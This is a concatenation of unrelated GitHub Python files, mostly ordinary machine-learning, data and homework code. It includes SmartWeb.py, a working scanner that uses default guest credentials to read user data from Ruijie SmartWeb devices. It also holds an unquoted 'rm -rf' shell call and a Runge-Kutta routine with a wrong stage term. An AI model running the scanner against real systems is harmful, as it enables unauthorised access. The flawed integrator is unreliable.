\"\"\"Reversible Instance Normalization based on [1]\n\n Parameters\n ----------\n input_dim\n The dimension of the input axis being normalized\n eps\n The epsilon value for numerical stability\n affine\n Whether to apply an affine transformation after normalization\n\n References\n ----------\n .. [1] Kim et al. \"Reversible Instance Normalization for Accurate Time-Series Forecasting against\n Distribution Shift\" International Conference on Learning Representations (2022)\n \"\"\"\n\n super().__init__()\n self.input_dim = input_dim\n self.eps = eps\n self.affine = affine\n\n if self.affine:\n self.affine_weight = nn.Parameter(torch.ones(self.input_dim))\n self.affine_bias = nn.Parameter(torch.zeros(self.input_dim))\n\n def forward(self, x: torch.Tensor):\n # at the beginning of `PLForecastingModule.forward()`, `x` has shape\n # (batch_size, input_chunk_length, n_targets).\n # select all dimensions except batch and input_dim (0, -1)\n # TL;DR: calculate mean and variance over all dimensions except batch and input_dim\n calc_dims = tuple(range(1, x.ndim - 1))\n\n self.mean = torch.mean(x, dim=calc_dims, keepdim=True).detach()\n self.stdev = torch.sqrt(\n torch.var(x, dim=calc_dims, keepdim=True, unbiased=False) + self.eps\n ).detach()\n\n x = x - self.mean\n x = x / self.stdev\n if self.affine:\n x = x * self.affine_weight\n x = x + self.affine_bias\n\n return x\n\n def inverse(self, x: torch.Tensor):\n # x is assumed to be the output of PLForecastingModule.forward(), and has shape\n # (batch_size, output_chunk_length, n_targets, nr_params). we ha\n if self.affine:\n x = x - self.affine_bias.view(self.affine_bias.shape + (1,))\n x = x / (\n self.affine_weight.view(self.affine_weight.shape + (1,))\n + self.eps * self.eps\n )\n x = x * self.stdev.view(self.stdev.shape + (1,))\n x = x + self.mean.view(self.mean.shape + (1,))\n return x\n","repo_name":"unit8co/darts","sub_path":"darts/models/components/layer_norm_variants.py","file_name":"layer_norm_variants.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":6665,"dataset":"github-code","pt":"21"} +{"seq_id":"40490507077","text":"\"\"\"\nfordev.generators.pis_pasep\n---------------------------\n\"\"\"\n\nfrom fordev.core import fordev_request\n\nfrom fordev.filters import data_format\n\n\ndef pis_pasep(formatting: bool=True, data_only: bool=True) -> str:\n \"\"\"Gere o código do PIS/PASEP aleatório.\"\"\"\n\n resp = fordev_request(\n content_length=26,\n referer='gerador_de_pis_pasep',\n payload={\n 'acao': 'gerar_pis',\n 'pontuacao': 'S' if formatting else 'N'\n }\n )\n\n return data_format(data_only=data_only, data_dict=resp)\n","repo_name":"matheusfelipeog/fordev","sub_path":"fordev/generators/pis_pasep.py","file_name":"pis_pasep.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"pt","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"10490486601","text":"#질병 입력받기\r\n\r\ndef doctor():\r\n A = {\"K20\":\"식도염\", \"K21\":\"위-식도역류병\",\"K22\":\"식도의 기타 질환\",\"K23*\":\"달리 분류된 질환에서의 식도의 장애\",\r\n \"K25\":\"위궤양\",\"K26\":\"십이지장궤양\",\"K27\":\"상세불명 부위의 소화성 궤양\",\"K28\":\"위공장궤양\",\r\n \"K29\": \"위염 및 십이지장염\",\"K30\":\"기능성 소화불량\",\"K31\":\"위 및 십이지장의 기타 질환\"}\r\n\r\n B = {}\r\n for i in range(5):\r\n name = input(\"환자명 입력\")\r\n B[name] = input(\"질병코드 입력. 단, 동일 질병 2인 이상 입력\")\r\n\r\n\r\n P_NAME = input(\"환자 이름을 입력하세요\") #환자 이름 입력받기\r\n\r\n for key,value in B.items():\r\n if key == P_NAME:\r\n print(\"환자이름은 {}, 질병코드는 {}, 질병명은 {} 입니다\".format(P_NAME, value, A[value]))\r\n\r\n\r\n D_NUM2 = input(\"질병 코드를 입력하세요\") # 질병코드 입력받기\r\n for key,value in B.items():\r\n if value == D_NUM2:\r\n print(\"환자이름은 {}, 질병코드는 {}, 질병명은 {} 입니다\".format(key, D_NUM2, A[value]))\r\n\r\ndoctor()","repo_name":"charlie231/Python","sub_path":"Math!/Doctor_4.py","file_name":"Doctor_4.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20107570165","text":"#!/usr/bin/env python\n\nimport sys, os, re\nimport json\nimport datetime, iso8601\n\n# 날짜와 기본 경로를 에어플로우에서 main()으로 전달\ndef main(iso_date, base_path):\n APP_NAME = \"pyspark_task_one.py\"\n \n # SparkSession이 없다면 그 환경을 생성\n try:\n sc and spark\n except NameError as e:\n import findspark\n findspark.init()\n import pyspark\n import pyspark.sql\n \n sc = pyspark.SparkContext()\n spark = pyspark.sql.SparkSession(sc).builder.appName(APP_NAME).getOrCreate()\n\n # 오늘 날짜 가져오기\n today_dt = iso8601.parse_date(iso_date)\n rounded_today = today_dt.date()\n\n # 오늘 날짜 적재\n today_input_path = \"{}/ch02/data/example_name_titles_daily.json/{}\".format(\n base_path,\n rounded_today.isoformat()\n )\n\n # 데이터를 적재하고 계속 진행\n people_titles = spark.read.json(today_input_path)\n people_titles.show()\n \n # RDD로 Group by\n titles_by_name = people_titles.rdd.groupBy(lambda x: x[\"name\"])\n \n # 그룹키와 그룹화된 데이터를 받아서 다양한 직함을 마스터 직함으로 연결\n def concatenate_titles(people_titles):\n name = people_titles[0]\n title_records = people_titles[1]\n master_title = \"\"\n for title_record in sorted(title_records):\n title = title_record[\"title\"]\n master_title += \"{}, \".format(title)\n master_title = master_title[:-2]\n record = {\"name\": name, \"master_title\": master_title}\n return record\n \n people_with_contactenated_titles = titles_by_name.map(concatenate_titles)\n people_output_json = people_with_contactenated_titles.map(json.dumps)\n \n # 오늘의 출력 경로 가져오기\n today_output_path = \"{}/ch02/data/example_master_titles_daily.json/{}\".format(\n base_path,\n rounded_today.isoformat()\n )\n \n # 오늘의 출력 경로 쓰기/대체하기\n os.system(\"rm -rf {}\".format(today_output_path))\n people_output_json.saveAsTextFile(today_output_path)\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n","repo_name":"wikibook/agile-data-science","sub_path":"ch02/pyspark_task_one.py","file_name":"pyspark_task_one.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72627068533","text":"#!/usr/bin/env python\n# -*- conding:utf-8 -*-\n\nimport requests\nimport urllib3\nimport argparse\nimport sys\nurllib3.disable_warnings()\n\n\ndef title():\n print(\"\"\"\n 锐捷无线SmartWeb管理系统存在逻辑缺陷漏洞\n CNVD-2021-17369 \n use: python3 SmartWeb.py\n Author: Henry4E36\n \"\"\")\n\nclass information(object):\n def __init__(self, args):\n self.args = args\n self.url = args.url\n self.file = args.file\n\n def target_url(self):\n target_url = self.url + \"/web/xml/webuser-auth.xml\"\n # 请求头添加默认密码:guest/guest 信息。\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0\",\n \"Cookie\": \"login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302;auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\"\n }\n try:\n res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)\n if res.status_code == 200 and \"user\" in res.text:\n print(f\"\\033[31m[{chr(8730)}] 目标系统: {self.url} 存在逻辑缺陷问题!\")\n print(f\"[-] 响应为:{res.text}\")\n else:\n print(f\"[\\033[31mx\\033[0m] 目标系统: {self.url} 不存在逻辑缺陷问题!\")\n\n except Exception as e:\n print(\"[\\033[31X\\033[0m] 站点连接失败\")\n\n\n def file_url(self):\n with open(self.file, \"r\") as urls:\n for url in urls:\n url = url.strip()\n if url[:4] != \"http\":\n url = \"http://\" + url\n self.url = url.strip()\n information.target_url(self)\n\nif __name__ == \"__main__\":\n title()\n parser = argparse.ArgumentParser(description=\"锐捷无线 SmartWeb 管理系统逻辑缺陷漏洞\")\n parser.add_argument(\"-u\", \"--url\", type=str, metavar=\"url\", help=\"Target url eg:\\\"http://127.0.0.1\\\"\")\n parser.add_argument(\"-f\", \"--file\", metavar=\"file\", help=\"Targets in file eg:\\\"ip.txt\\\"\")\n args = parser.parse_args()\n if len(sys.argv) != 3:\n print(\n \"[-] 参数错误!\\neg1:>>>python3 SmartWeb.py -u http://127.0.0.1\\neg2:>>>python3 SmartWeb.py -f ip.txt\")\n elif args.url:\n information(args).target_url()\n elif args.file:\n information(args).file_url()\n\n","repo_name":"Henry4E36/SmartWeb","sub_path":"SmartWeb.py","file_name":"SmartWeb.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31824131476","text":"import subprocess\nfrom subprocess import call\nimport tempfile\nimport sys\nimport datetime\nimport os\nimport gridfs\nimport json\nfrom subprocess import Popen\n\n\n\ndef convert_request(dbcol, sourceid, conv_req, tempdir):\n \"\"\"\n returns the conversion doc, and then also potentially advances\n the state machine. \n \n \"\"\"\n\n # find the conversion doc\n query = {'type' : 'conversion',\n 'source' : sourceid}\n query.update(conv_req)\n\n doc = dbcol.find_one(query)\n\n if doc == None:\n # start the process\n newdoc = query\n newdoc['state'] = 'pending'\n newdoc['start'] = datetime.datetime.utcnow()\n\n oid = dbcol.insert(newdoc)\n newdoc[\"_id\"] = oid\n conversion_start(dbcol.database, newdoc, tempdir)\n \n return newdoc\n \n else:\n # we found a single doc:\n \n if doc['state'] == 'done':\n return doc\n\n if doc['state'] == 'pending':\n donestate = conversion_check_done(dbcol.database, doc, tempdir)\n if donestate['done'] == False:\n # not done yet\n return doc\n elif donestate['done'] == True:\n # it's done, yay!\n doc['state'] = 'done'\n if donestate['error'] == None:\n # success\n gfs = gridfs.GridFS(dbcol.database)\n fid = gfs.new_file() # FIX content type?\n donefilename = donestate['filename']\n fid.write(file(donefilename, 'r').read())\n fid.close()\n doc['error'] = None\n doc['output'] = fid._id;\n dbcol.update({\"_id\": doc['_id']},\n doc, safe=True)\n \n conversion_cleanup(doc, tempdir)\n else:\n doc['error'] = donestate['error']\n dbcol.update({\"_id\": doc['_id']},\n doc, safe=True)\n conversion_cleanup(doc, tempdir)\n return doc\n\n \n\n# Conversion process does everything based off of the conversion id,\n# creating id.in, id.req, id.result, and id.out\n\n \ndef conversion_start(db, reqdoc, tempdir):\n \"\"\"\n db : db\n reqdoc : conversion document\n tempdir : where shit is goin' \n \"\"\"\n src_id = reqdoc['source']\n conv_id = reqdoc['_id']\n\n # write the source filename\n gfs = gridfs.GridFS(db)\n fid = gfs.get(src_id)\n\n img_filename = os.path.join(tempdir, str(conv_id) + \".in\")\n f = file(img_filename, 'w')\n f.write(fid.read())\n f.close()\n\n # write the request doc\n req_filename = os.path.join(tempdir, str(conv_id) + \".req\")\n\n req_dict = {}\n for k, v in reqdoc.iteritems():\n if k == 'start':\n pass\n elif (k != '_id') and (k != 'source'):\n req_dict[k] = v\n \n f = file(req_filename, 'w')\n\n json.dump(req_dict, f)\n f.close()\n\n result_filename = os.path.join(tempdir, str(conv_id) + \".result\")\n out_filename = os.path.join(tempdir, str(conv_id) + \".out\")\n\n run_convert(img_filename, req_filename, result_filename, out_filename)\n \n \n\ndef conversion_check_done(dbcol, reqdoc, tempdir):\n \"\"\"\n dbcol : db collection\n oid : document id of this conversion\n tempdir : where shit is goin' \n\n returns:\n {'done' : True/false\n 'error' : None / yes\n 'filename' : output filename,\n 'donedate' : last modified date on file \n }\n \"\"\"\n\n conv_id = str(reqdoc['_id'])\n result_filename = os.path.join(tempdir, str(conv_id) + \".result\")\n out_filename = os.path.join(tempdir, str(conv_id) + \".out\")\n \n if os.path.exists(result_filename):\n # done!\n res = {'done' : True,\n 'error' : None}\n rd = json.load(file(result_filename, 'r'))\n if rd['status'] == 'error':\n res['error'] = {'stdout' : rd.get('stdout', \"\"),\n 'retcode' : rd.get('retcode', -1),\n 'reason' : rd.get('reason', \"\")}\n else:\n res['filename'] = out_filename\n res['donedate'] = os.path.getmtime(out_filename)\n \n return res\n \n else:\n return {'done' : False}\n \ndef conversion_cleanup(reqdoc, tempdir):\n \"\"\"\n Clean up any of the conversion detritus\n \"\"\"\n id = str(reqdoc['_id'])\n base = os.path.join(tempdir, str(id))\n for ext in ['in', 'req', 'result', 'out']:\n try:\n os.remove(base + \".\" + ext)\n except:\n pass\n\ndef run_convert(img_filename, req_filename, result_filename, out_filename):\n \"\"\"\n Actually perform the spawn, and then just leave it to do its thing\n\n\n \"\"\"\n \n p = Popen([\"python\", \"-m\", \"mementa.figure_convert_runner\",\n img_filename, req_filename, result_filename, out_filename])\n\n \n","repo_name":"mementa/mementa","sub_path":"mementa/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16477877762","text":"from matplotlib import pyplot as plt\r\nfrom matplotlib.ticker import MultipleLocator\r\n\r\ndef SHO_RK4(f1,f2,x0,y10,y20,h,n=100):\r\n# 'f1' - (dy1/dx) \r\n# 'f2' - (dy2/dx) or (d^2y1/dx^2)\r\n# 'x0' - independent variable - initial value\r\n# 'y10' - y1 - initial value\r\n# 'y20' - y2 - initial value\r\n# 'h' - step size of independent variable\r\n# 'n' - max iteration count\r\n \r\n res = [[x0,y10]]\r\n x = x0\r\n xn = x0\r\n y1 = y10\r\n y1n = y10\r\n y2 = y20\r\n y2n = y20\r\n\r\n for i in range(1,n):\r\n x = x0 + (i-1)*h\r\n k1y1 = h*eval(f1)\r\n k1y2 = h*eval(f2)\r\n x = x + h/2\r\n y1 = y1n + (k1y1/2)\r\n y2 = y2n + (k1y2/2)\r\n k2y1 = h*eval(f1)\r\n k2y2 = h*eval(f2)\r\n y1 = y1n + (k2y1/2)\r\n y2 = y2n + (k2y2/2)\r\n k3y1 = h*eval(f1)\r\n k3y2 = h*eval(f2)\r\n y1 = y1n + (k2y1/2)\r\n y2 = y2n + (k2y2/2)\r\n x = x + h/2\r\n k4y1 = h*eval(f1)\r\n k4y2 = h*eval(f2)\r\n y1n = y1n + (k1y1 + 2*k2y1 + 2*k3y1 + k4y1)/6\r\n y2n = y2n + (k1y2 + 2*k2y2 + 2*k3y2 + k4y2)/6\r\n \r\n res.append([])\r\n # res[i] = res[i-1] + (h/6)*(t1 + 4*t2 + t3)\r\n res[(len(res)-1)].append(x0 + i*h)\r\n res[(len(res)-1)].append(y1n)\r\n # res[(len(res)-1)].append(y2n)\r\n \r\n return(res)\r\n\r\n# file read module\r\nfin = open(r\"C:\\Main\\Study\\Sem 5\\P346 Computational Phy Lab\\Code\\Assgn6\\Q1 in.txt\", \"r+\")\r\ninp = fin.readlines()\r\nfor i in range(len(inp)-1): inp[i] = inp[i][:-1] #input functions\r\n\r\nfn = inp[0]\r\ngn = inp[1]\r\ns=30\r\n\r\na = SHO_RK4(fn,gn,0,2,-1,0.05,2000) \r\n\r\n#plotting\r\nx = []\r\ny = []\r\nfor i in range(len(a)):\r\n x.append(a[i][0])\r\n y.append(a[i][1])\r\n\r\nfig, ax = plt.subplots()\r\n# plt.plot(x,y)\r\nplt.scatter(x,y, marker='.', s=s)\r\nax.xaxis.set_major_locator(MultipleLocator(20))\r\nax.xaxis.set_major_formatter('{x:.0f}')\r\nplt.grid()\r\n# plt.legend(('\\u03BB','=0.2','\\u03C9','=1.2'),loc='upper right')\r\nplt.xlabel(\"Time (t)\")\r\nplt.ylabel(\"Position (y(t))\")\r\nplt.title(\"Forced-damped SHO (2*d\\N{SUPERSCRIPT TWO}y/dx\\N{SUPERSCRIPT TWO} + \\u03BB*dy/dt + 2*y = 2*cos(\\u03C9t)): RK4\")\r\nplt.savefig(\"Q1 \\u03BB=0.2, \\u03C9=1.2.png\")\r\n# plt.show()","repo_name":"Enigma811/P346","sub_path":"Assgn6/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"104116841","text":"def solution(lottos, win_nums):\n tiers = {6:1, 5:2, 4:3, 3:4, 2:5, 1:6, 0:6}\n correct = 0\n zero = 0\n for num in lottos:\n if num in win_nums:\n correct += 1\n if num == 0:\n zero += 1\n answer = [tiers[correct+zero], tiers[correct]]\n return answer","repo_name":"hanjihun2000/coding-test-practice","sub_path":"programmers/python/77484.py","file_name":"77484.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70883700533","text":"\"\"\"Script for training and evaluating QA models.\n\nExample command to train the (medium-sized) baseline model on SQuAD\nwith a GPU, and write its predictions to an output file:\n\nUsage:\n python3 main.py \\\n --use_gpu \\\n --model \"baseline\" \\\n --model_path \"squad_model.pt\" \\\n --train_path \"datasets/squad_train.jsonl.gz\" \\\n --dev_path \"datasets/squad_dev.jsonl.gz\" \\\n --output_path \"squad_predictions.txt\" \\\n --hidden_dim 256 \\\n --bidirectional \\\n --do_train \\\n --do_test\n\nAuthor:\n Shrey Desai and Yasumasa Onoe\n\"\"\"\n\nimport argparse\nimport pprint\nimport json\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom data import QADataset, Tokenizer, Vocabulary\n\nfrom model import BaselineReader\nfrom utils import cuda, search_span_endpoints, unpack\n\n\n_TQDM_BAR_SIZE = 75\n_TQDM_LEAVE = False\n_TQDM_UNIT = ' batches'\n_TQDM_OPTIONS = {\n 'ncols': _TQDM_BAR_SIZE, 'leave': _TQDM_LEAVE, 'unit': _TQDM_UNIT\n}\n\n\nparser = argparse.ArgumentParser()\n\n# Training arguments.\nparser.add_argument('--device', type=int)\nparser.add_argument(\n '--use_gpu',\n action='store_true',\n help='whether to use GPU',\n)\nparser.add_argument(\n '--model',\n type=str,\n required=True,\n choices=['baseline'],\n help='which model to use',\n)\nparser.add_argument(\n '--model_path',\n type=str,\n required=True,\n help='path to load/save model checkpoints',\n)\nparser.add_argument(\n '--embedding_path',\n type=str,\n default='glove/glove.6B.300d.txt',\n help='GloVe embedding path',\n)\nparser.add_argument(\n '--train_path',\n type=str,\n required=True,\n help='training dataset path',\n)\nparser.add_argument(\n '--dev_path',\n type=str,\n required=True,\n help='dev dataset path',\n)\nparser.add_argument(\n '--max_context_length',\n type=int,\n default=384,\n help='maximum context length (do not change!)',\n)\nparser.add_argument(\n '--max_question_length',\n type=int,\n default=64,\n help='maximum question length (do not change!)',\n)\nparser.add_argument(\n '--output_path',\n type=str,\n required=False,\n help='predictions output path',\n)\nparser.add_argument(\n '--shuffle_examples',\n action='store_true',\n help='shuffle training example at the beginning of each epoch',\n)\n\n# Optimization arguments.\nparser.add_argument(\n '--epochs',\n type=int,\n default=10,\n help='number of training epochs',\n)\nparser.add_argument(\n '--batch_size',\n type=int,\n default=64,\n help='training and evaluation batch size',\n)\nparser.add_argument(\n '--learning_rate',\n type=float,\n default=1e-3,\n help='training learning rate',\n)\nparser.add_argument(\n '--weight_decay',\n type=float,\n default=0.,\n help='training weight decay',\n)\nparser.add_argument(\n '--grad_clip',\n type=float,\n default=0.5,\n help='gradient norm clipping value',\n)\nparser.add_argument(\n '--early_stop',\n type=int,\n default=3,\n help='number of epochs to wait until early stopping',\n)\nparser.add_argument(\n '--do_train',\n action='store_true',\n help='flag to enable training',\n)\nparser.add_argument(\n '--do_test',\n action='store_true',\n help='flag to enable testing',\n)\n\n# Model arguments.\nparser.add_argument(\n '--vocab_size',\n type=int,\n default=50000,\n help='vocabulary size (dynamically set, do not change!)',\n)\nparser.add_argument(\n '--embedding_dim',\n type=int,\n default=300,\n help='embedding dimension',\n)\nparser.add_argument(\n '--hidden_dim',\n type=int,\n default=256,\n help='hidden state dimension',\n)\nparser.add_argument(\n '--rnn_cell_type',\n choices=['lstm', 'gru'],\n default='lstm',\n help='Type of RNN cell',\n)\nparser.add_argument(\n '--bidirectional',\n action='store_true',\n help='use bidirectional RNN',\n)\nparser.add_argument(\n '--dropout',\n type=float,\n default=0.,\n help='dropout on passage and question vectors',\n)\n\n\ndef _print_arguments(args):\n \"\"\"Pretty prints command line args to stdout.\n\n Args:\n args: `argparse` object.\n \"\"\"\n\n args_dict = vars(args)\n pprint.pprint(args_dict)\n\n\ndef _select_model(args):\n \"\"\"\n Selects and initializes model. To integrate custom models, (1)\n add the model name to the parser choices above, and (2) modify\n the conditional statements to include an instance of the model.\n\n Args:\n args: `argparse` object.\n\n Returns:\n Instance of a PyTorch model supplied with args.\n \"\"\"\n if args.model == 'baseline':\n return BaselineReader(args)\n else:\n raise RuntimeError(f'model \\'{args.model}\\' not recognized!')\n\n\ndef _early_stop(args, eval_history):\n \"\"\"\n Determines early stopping conditions. If the evaluation loss has\n not improved after `args.early_stop` epoch(s), then training\n is ended prematurely. \n\n Args:\n args: `argparse` object.\n eval_history: List of booleans that indicate whether an epoch resulted\n in a model checkpoint, or in other words, if the evaluation loss\n was lower than previous losses.\n\n Returns:\n Boolean indicating whether training should stop.\n \"\"\"\n return (\n len(eval_history) > args.early_stop\n and not any(eval_history[-args.early_stop:])\n )\n\n\ndef _calculate_loss(\n start_logits, end_logits, start_positions, end_positions\n):\n \"\"\"\n Calculates cross-entropy loss for QA samples, which is defined as\n the mean of the loss values incurred by the starting and ending position\n distributions when compared to the gold endpoints.\n\n Args:\n start_logits: Predicted distribution over start positions.\n end_logits: Predicted distribution over end positions.\n start_positions: Gold start positions.\n end_positions: Gold end positions.\n\n Returns:\n Loss value for a batch of sasmples.\n \"\"\"\n # If the gold span is outside the scope of the maximum\n # context length, then ignore these indices when computing the loss.\n ignored_index = start_logits.size(1)\n start_positions.clamp_(0, ignored_index)\n end_positions.clamp_(0, ignored_index)\n\n # Compute the cross-entropy loss for the start and end logits.\n criterion = nn.CrossEntropyLoss(ignore_index=ignored_index)\n start_loss = criterion(start_logits, start_positions)\n end_loss = criterion(end_logits, end_positions)\n\n return (start_loss + end_loss) / 2.\n\n\ndef train(args, epoch, model, dataset):\n \"\"\"\n Trains the model for a single epoch using the training dataset.\n\n Args:\n args: `argparse` object.\n epoch: Epoch number (used in the `tqdm` bar).\n model: Instance of the PyTorch model.\n dataset: Training dataset.\n\n Returns:\n Training cross-entropy loss normalized across all samples.\n \"\"\"\n # Set the model in \"train\" mode.\n model.train()\n\n # Cumulative loss and steps.\n train_loss = 0.\n train_steps = 0\n\n # Set up optimizer.\n optimizer = optim.Adam(\n model.parameters(),\n lr=args.learning_rate,\n weight_decay=args.weight_decay,\n )\n\n # Set up training dataloader. Creates `args.batch_size`-sized\n # batches from available samples.\n train_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=args.shuffle_examples),\n **_TQDM_OPTIONS,\n )\n\n for batch in train_dataloader:\n # Zero gradients.\n optimizer.zero_grad()\n\n # Forward inputs, calculate loss, optimize model.\n start_logits, end_logits = model(batch)\n loss = _calculate_loss(\n start_logits,\n end_logits,\n batch['start_positions'],\n batch['end_positions'],\n )\n loss.backward()\n if args.grad_clip > 0.:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n optimizer.step()\n\n # Update tqdm bar.\n train_loss += loss.item()\n train_steps += 1\n train_dataloader.set_description(\n f'[train] epoch = {epoch}, loss = {train_loss / train_steps:.6f}'\n )\n\n return train_loss / train_steps\n\n\ndef evaluate(args, epoch, model, dataset):\n \"\"\"\n Evaluates the model for a single epoch using the development dataset.\n\n Args:\n args: `argparse` object.\n epoch: Epoch number (used in the `tqdm` bar).\n model: Instance of the PyTorch model.\n dataset: Development dataset.\n\n Returns:\n Evaluation cross-entropy loss normalized across all samples.\n \"\"\"\n # Set the model in \"evaluation\" mode.\n model.eval()\n\n # Cumulative loss and steps.\n eval_loss = 0.\n eval_steps = 0\n\n # Set up evaluation dataloader. Creates `args.batch_size`-sized\n # batches from available samples. Does not shuffle.\n eval_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=False),\n **_TQDM_OPTIONS,\n )\n\n with torch.no_grad():\n for batch in eval_dataloader:\n # Forward inputs, calculate loss.\n start_logits, end_logits = model(batch)\n loss = _calculate_loss(\n start_logits,\n end_logits,\n batch['start_positions'],\n batch['end_positions'],\n )\n\n # Update tqdm bar.\n eval_loss += loss.item()\n eval_steps += 1\n eval_dataloader.set_description(\n f'[eval] epoch = {epoch}, loss = {eval_loss / eval_steps:.6f}'\n )\n\n return eval_loss / eval_steps\n\n\ndef write_predictions(args, model, dataset):\n \"\"\"\n Writes model predictions to an output file. The official QA metrics (EM/F1)\n can be computed using `evaluation.py`. \n\n Args:\n args: `argparse` object.\n model: Instance of the PyTorch model.\n dataset: Test dataset (technically, the development dataset since the\n official test datasets are blind and hosted by official servers).\n \"\"\"\n # Load model checkpoint.\n model.load_state_dict(torch.load(args.model_path, map_location='cpu'))\n model.eval()\n\n # Set up test dataloader.\n test_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=False),\n **_TQDM_OPTIONS,\n )\n\n # Output predictions.\n outputs = []\n\n with torch.no_grad():\n for (i, batch) in enumerate(test_dataloader):\n # Forward inputs.\n start_logits, end_logits = model(batch)\n\n # Form distributions over start and end positions.\n batch_start_probs = F.softmax(start_logits, 1)\n batch_end_probs = F.softmax(end_logits, 1)\n\n for j in range(start_logits.size(0)):\n # Find question index and passage.\n sample_index = args.batch_size * i + j\n qid, passage, _, _, _ = dataset.samples[sample_index]\n\n # Unpack start and end probabilities. Find the constrained\n # (start, end) pair that has the highest joint probability.\n start_probs = unpack(batch_start_probs[j])\n end_probs = unpack(batch_end_probs[j])\n start_index, end_index = search_span_endpoints(\n start_probs, end_probs\n )\n \n # Grab predicted span.\n pred_span = ' '.join(passage[start_index:(end_index + 1)])\n\n # Add prediction to outputs.\n outputs.append({'qid': qid, 'answer': pred_span})\n\n # Write predictions to output file.\n with open(args.output_path, 'w+') as f:\n for elem in outputs:\n f.write(f'{json.dumps(elem)}\\n')\n\n\ndef main(args):\n \"\"\"\n Main function for training, evaluating, and checkpointing.\n\n Args:\n args: `argparse` object.\n \"\"\"\n # Print arguments.\n print('\\nusing arguments:')\n _print_arguments(args)\n print()\n\n # Check if GPU is available.\n if not args.use_gpu and torch.cuda.is_available():\n print('warning: GPU is available but args.use_gpu = False')\n print()\n\n # Set up datasets.\n train_dataset = QADataset(args, args.train_path)\n dev_dataset = QADataset(args, args.dev_path)\n\n # Create vocabulary and tokenizer.\n vocabulary = Vocabulary(train_dataset.samples, args.vocab_size)\n tokenizer = Tokenizer(vocabulary)\n for dataset in (train_dataset, dev_dataset):\n dataset.register_tokenizer(tokenizer)\n args.vocab_size = len(vocabulary)\n args.pad_token_id = tokenizer.pad_token_id\n print(f'vocab words = {len(vocabulary)}')\n\n # Print number of samples.\n print(f'train samples = {len(train_dataset)}')\n print(f'dev samples = {len(dev_dataset)}')\n print()\n\n # Select model.\n model = _select_model(args)\n num_pretrained = model.load_pretrained_embeddings(\n vocabulary, args.embedding_path\n )\n pct_pretrained = round(num_pretrained / len(vocabulary) * 100., 2)\n print(f'using pre-trained embeddings from \\'{args.embedding_path}\\'')\n print(\n f'initialized {num_pretrained}/{len(vocabulary)} '\n f'embeddings ({pct_pretrained}%)'\n )\n print()\n\n if args.use_gpu:\n model = cuda(args, model)\n\n params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'using model \\'{args.model}\\' ({params} params)')\n print(model)\n print()\n\n if args.do_train:\n # Track training statistics for checkpointing.\n eval_history = []\n best_eval_loss = float('inf')\n\n # Begin training.\n for epoch in range(1, args.epochs + 1):\n # Perform training and evaluation steps.\n train_loss = train(args, epoch, model, train_dataset)\n eval_loss = evaluate(args, epoch, model, dev_dataset)\n\n # If the model's evaluation loss yields a global improvement,\n # checkpoint the model.\n eval_history.append(eval_loss < best_eval_loss)\n if eval_loss < best_eval_loss:\n best_eval_loss = eval_loss\n torch.save(model.state_dict(), args.model_path)\n \n print(\n f'epoch = {epoch} | '\n f'train loss = {train_loss:.6f} | '\n f'eval loss = {eval_loss:.6f} | '\n f\"{'saving model!' if eval_history[-1] else ''}\"\n )\n\n # If early stopping conditions are met, stop training.\n if _early_stop(args, eval_history):\n suffix = 's' if args.early_stop > 1 else ''\n print(\n f'no improvement after {args.early_stop} epoch{suffix}. '\n 'early stopping...'\n )\n print()\n break\n\n if args.do_test:\n # Write predictions to the output file. Use the printed command\n # below to obtain official EM/F1 metrics.\n write_predictions(args, model, dev_dataset)\n eval_cmd = (\n 'python3 evaluate.py '\n f'--dataset_path {args.dev_path} '\n f'--output_path {args.output_path}'\n )\n print()\n print(f'predictions written to \\'{args.output_path}\\'')\n print(f'compute EM/F1 with: \\'{eval_cmd}\\'')\n print()\n\n\nif __name__ == '__main__':\n main(parser.parse_args())\n","repo_name":"gregdurrett/nlp-qa-finalproj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15318,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"7996028002","text":"import fitz\nfrom pathlib import Path\nfrom time import sleep\n\nfrom django.core.management import call_command\n\n\nclass DemoHWBundleService:\n \"\"\"Handle creating homework bundles in the demo.\"\"\"\n\n def make_hw_bundle(self, bundle: dict):\n paper_number = bundle[\"paper_number\"]\n question_list = bundle[\"pages\"]\n\n print(\n f\"Making a homework bundle as paper {paper_number} with question-page mapping {question_list}\"\n )\n\n # question_list should be a list of lists eg [[1], [1,2], [], [2,3]]\n out_file = Path(f\"fake_hw_bundle_{paper_number}.pdf\")\n doc = fitz.Document()\n pg = 0\n for ql in question_list:\n pg += 1\n doc.new_page(-1)\n if ql:\n txt = 